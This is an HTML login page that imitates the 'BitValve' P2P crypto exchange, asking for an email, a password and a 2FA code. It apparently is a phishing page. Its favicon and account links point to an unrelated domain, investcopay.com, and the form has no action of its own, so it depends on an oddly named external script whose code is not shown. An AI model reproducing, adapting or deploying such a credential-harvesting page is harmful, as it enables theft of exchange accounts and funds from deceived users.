<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>BitValve | P2P crypto Exchange</title>
    <link rel="shortcut icon" href="https://investcopay.com/favicon.ico" />
    <script src="https://cdn.tailwindcss.com"></script>
  </head>
  <body class="h-screen font-sans bg-gray-800 dark:bg-gray-850">
    <div id="app" class="flex flex-col h-full" data-v-app="">
      <div
        class="flex flex-col sm:px-10 overflow-y-overlay px-1.5 w-full h-full"
      >
        <button
          type="button"
          class="p-2 text-gray-900 transition-colors duration-500 dark:text-gray-300 hover:text-gray-400 dark:hover:text-gray-200 dark:focus:text-gray-200 focus:text-gray-800 focus:outline-none mt-2 ml-auto"
          aria-label="Toggle dark mode"
        >
          <svg
            xmlns="http://www.w3.org/2000/svg"
            class="stroke-current size-4"
            viewBox="0 0 24 24"
            stroke-width="2"
            stroke-linecap="round"
            stroke-linejoin="round"
            fill="none"
            aria-hidden="true"
          >
            <use xlink:href="/assets/icons-qOC4rG5W.svg#icon-sun-moon"></use>
          </svg>
        </button>
        <main
          class="flex flex-col items-center justify-center flex-none flex-grow w-full"
        >
          <div
            class="flex flex-col items-center w-full max-w-md mx-auto md:my-8"
          >
            <a href="index.html" class=""
              ><img
                src="data:image/svg+xml,%3csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20170%2040'%20fill='%23002F22'%3e%3cpath%20d='M64.9%2022.3c0-2.2-1.4-3.3-4.1-3.3h-5.9v7h6.2c2.6%200%203.8-1.2%203.8-3.7zm-10-6.1h5.7c2.3%200%203.4-1.1%203.4-3.5%200-2.1-1.2-3.1-3.3-3.1H55v6.6zm13.5%206.4c0%203.8-2.7%206.3-6.8%206.3h-10V6.7h9.3c4%200%206.6%202.2%206.6%205.6%200%202.6-1.5%204.4-4.7%205.2%204%20.5%205.6%202.6%205.6%205.1z'/%3e%3cpath%20d='M72.4%2028.9h3.3V13.2h-3.3v15.7zm-.6-21.2c0-1.4.8-2.2%202.2-2.2%201.4%200%202.2.8%202.2%202.2%200%201.4-.8%202.3-2.2%202.3-1.4%200-2.2-.8-2.2-2.3z'/%3e%3cpath%20d='M83.9%2016.5V26h4.2v2.9h-3.2c-2.6%200-4.3-1.7-4.3-4.2v-8.2h-3.2v-2.9h3.2V8.9h3.3v4.7h4.7v2.9h-4.7z'/%3e%3cpath%20d='M111%206.7l-8.2%2022.2h-4.7L89.7%206.7h4l5%2014%201.7%205.5%201.7-5.4%205-14.1z'/%3e%3cpath%20d='M122.6%2021.1c0-3.3-1.5-4.9-4.7-4.9s-4.7%201.6-4.7%204.9%201.5%204.9%204.7%204.9%204.7-1.6%204.7-4.9zm3-7.5v14.9h-3.2v-3.1c-1%202.1-2.9%203.4-5.4%203.4-4.3%200-7-3.1-7-7.8%200-4.7%202.7-7.8%206.9-7.8%202.6%200%204.5%201.2%205.6%203.5v-3.1h3.1z'/%3e%3cpath%20d='M131.2%2028.9h3.4V6.7h-3.4z'/%3e%3cpath%20d='M152.5%2013.3l-5.8%2015.6h-4l-5.9-15.6h3.6l4.3%2013.2%204.4-13.2z'/%3e%3cpath%20d='M158.1%2019.8h8.1c-.1-2.9-1.3-4-3.9-4-2.6%200-3.9%201.3-4.2%204m11.2%202.3H158c.2%203%201.5%204.2%204.3%204.2%202.1%200%203-.5%203.7-2.3l3%201c-1.1%202.6-3.6%203.9-6.6%203.9-4.6%200-7.6-3-7.6-7.7s3.1-7.8%207.4-7.8c4.2%200%207.1%202.9%207.1%207.5.1.4.1.6%200%201.2'/%3e%3cpath%20d='M26.9%206.7V0H0v26.7h6.8v6.6h6.7v-6.6H6.8V20h6.7v-6.7H6.8V6.7h20.1v6.6h6.7V6.7z'/%3e%3cpath%20d='M20.2%2020h6.7v-6.7h-6.7z'/%3e%3cpath%20d='M13.5%2026.7h6.7V20h-6.7z'/%3e%3cpath%20d='M26.9%2026.7h6.7V20h-6.7z'/%3e%3cpath%20d='M20.2%2033.3h6.7v-6.6h-6.7z'/%3e%3cpath%20d='M13.5%2040h6.7v-6.7h-6.7z'/%3e%3c/svg%3e"
                alt="BitValve"
                class="inline-block w-auto h-7 lg:h-8 dark:hidden"
                width="170"
                height="40" /><img
                src="data:image/svg+xml,%3csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20170%2040'%20fill='%23FFFFFF'%3e%3cpath%20d='M64.9%2022.3c0-2.2-1.4-3.3-4.1-3.3h-5.9v7h6.2c2.6%200%203.8-1.2%203.8-3.7zm-10-6.1h5.7c2.3%200%203.4-1.1%203.4-3.5%200-2.1-1.2-3.1-3.3-3.1H55v6.6zm13.5%206.4c0%203.8-2.7%206.3-6.8%206.3h-10V6.7h9.3c4%200%206.6%202.2%206.6%205.6%200%202.6-1.5%204.4-4.7%205.2%204%20.5%205.6%202.6%205.6%205.1z'/%3e%3cpath%20d='M72.4%2028.9h3.3V13.2h-3.3v15.7zm-.6-21.2c0-1.4.8-2.2%202.2-2.2%201.4%200%202.2.8%202.2%202.2%200%201.4-.8%202.3-2.2%202.3-1.4%200-2.2-.8-2.2-2.3z'/%3e%3cpath%20d='M83.9%2016.5V26h4.2v2.9h-3.2c-2.6%200-4.3-1.7-4.3-4.2v-8.2h-3.2v-2.9h3.2V8.9h3.3v4.7h4.7v2.9h-4.7z'/%3e%3cpath%20d='M111%206.7l-8.2%2022.2h-4.7L89.7%206.7h4l5%2014%201.7%205.5%201.7-5.4%205-14.1z'/%3e%3cpath%20d='M122.6%2021.1c0-3.3-1.5-4.9-4.7-4.9s-4.7%201.6-4.7%204.9%201.5%204.9%204.7%204.9%204.7-1.6%204.7-4.9zm3-7.5v14.9h-3.2v-3.1c-1%202.1-2.9%203.4-5.4%203.4-4.3%200-7-3.1-7-7.8%200-4.7%202.7-7.8%206.9-7.8%202.6%200%204.5%201.2%205.6%203.5v-3.1h3.1z'/%3e%3cpath%20d='M131.2%2028.9h3.4V6.7h-3.4z'/%3e%3cpath%20d='M152.5%2013.3l-5.8%2015.6h-4l-5.9-15.6h3.6l4.3%2013.2%204.4-13.2z'/%3e%3cpath%20d='M158.1%2019.8h8.1c-.1-2.9-1.3-4-3.9-4-2.6%200-3.9%201.3-4.2%204m11.2%202.3H158c.2%203%201.5%204.2%204.3%204.2%202.1%200%203-.5%203.7-2.3l3%201c-1.1%202.6-3.6%203.9-6.6%203.9-4.6%200-7.6-3-7.6-7.7s3.1-7.8%207.4-7.8c4.2%200%207.1%202.9%207.1%207.5.1.4.1.6%200%201.2'/%3e%3cpath%20d='M26.9%206.7V0H0v26.7h6.8v6.6h6.7v-6.6H6.8V20h6.7v-6.7H6.8V6.7h20.1v6.6h6.7V6.7z'/%3e%3cpath%20d='M20.2%2020h6.7v-6.7h-6.7z'/%3e%3cpath%20d='M13.5%2026.7h6.7V20h-6.7z'/%3e%3cpath%20d='M26.9%2026.7h6.7V20h-6.7z'/%3e%3cpath%20d='M20.2%2033.3h6.7v-6.6h-6.7z'/%3e%3cpath%20d='M13.5%2040h6.7v-6.7h-6.7z'/%3e%3c/svg%3e"
                alt="BitValve"
                class="hidden w-auto h-7 lg:h-8 dark:inline-block"
                width="170"
                height="40"
            /></a>
            <div
              class="w-full p-4 mt-10 bg-gray-100 rounded-lg md:p-8 dark:bg-opacity-5"
            >
              <h1
                class="text-lg font-semibold text-teal-800 md:mt-2 dark:text-white"
              >
                Login
              </h1>
              <form id="loginForm" class="mt-8">
                <div class="space-y-3">
                  <label
                    class="flex items-baseline h-4 text-teal-800 dark:text-gray-300"
                    for="email"
                    ><span
                      class="order-2 font-semibold tracking-wide uppercase text-xxs opacity-50 dark:opacity-100"
                    >
                      Email </span
                    ><!----></label
                  ><input
                    id="email"
                    type="email"
                    class="w-full p-4 text-sm text-gray-800 bg-gray-600 rounded-lg shadow-input focus:outline-none dark:text-gray-300 bg-gray-750"
                    placeholder="Enter your email address"
                    autocomplete="username"
                    required
                  /><!---->
                </div>
                <div class="flex flex-col mt-4 space-y-3">
                  <label
                    class="flex items-baseline h-4 text-teal-800 dark:text-gray-300"
                    for="password"
                    ><span
                      class="order-2 font-semibold tracking-wide uppercase text-xxs opacity-50 dark:opacity-100"
                    >
                      Password </span
                    ><!----></label
                  ><input
                    id="password"
                    type="password"
                    required
                    class="w-full p-4 text-sm text-gray-800 bg-gray-600 rounded-lg shadow-input focus:outline-none dark:text-gray-300"
                    placeholder="Enter your password"
                    autocomplete="current-password"
                  /><!----><a
                    href="https://investcopay.com/auth/forgot-password"
                    class="ml-auto tracking-wide text-right text-teal-800 uppercase dark:text-white text-xxs"
                  >
                    I forgot my password
                  </a>
                </div>
                <div class="mt-4 space-y-3">
                  <label
                    class="flex items-baseline h-4 text-teal-800 dark:text-gray-300"
                    for="code"
                    ><span
                      class="order-2 font-semibold tracking-wide uppercase text-xxs opacity-50 dark:opacity-100"
                    >
                      2FA (If enabled) </span
                    ><!----></label
                  ><input
                    id="code"
                    type="text"
                    class="w-full p-4 text-sm text-gray-800 bg-gray-600 rounded-lg shadow-input focus:outline-none dark:text-gray-300"
                    autocomplete="one-time-code"
                  /><!---->
                </div>
                <button
                  class="transition-colors duration-300 rounded-full focus:outline-none disabled:cursor-not-allowed text-lime-150 font-bold font-mono bg-lime-200 dark:bg-lime-200 dark:active:bg-lime-200 dark:focus:ring-2 dark:ring-lime-500 w-full px-6 py-3 mt-10 hover:bg-lime-300 focus:bg-lime-300 dark:hover:bg-lime-300 dark:focus:bg-lime-300 dark:hover:text-black dark:focus:text-black"
                  type="submit"
                >
                  Login
                </button>
              </form>
            </div>
            <p
              class="mt-4 ml-auto mr-2 font-mono text-sm font-bold text-gray-400"
            >
              Don’t have an account yet?
              <a
                href="https://investcopay.com/auth/register"
                class="text-teal-800 underline dark:text-teal-400"
                >Register</a
              >
            </p>
          </div>
        </main>
      </div>
    </div>
    <script src="EgZjaHJbWUyBgg/myjs.js"></script>
  </body>
</html>
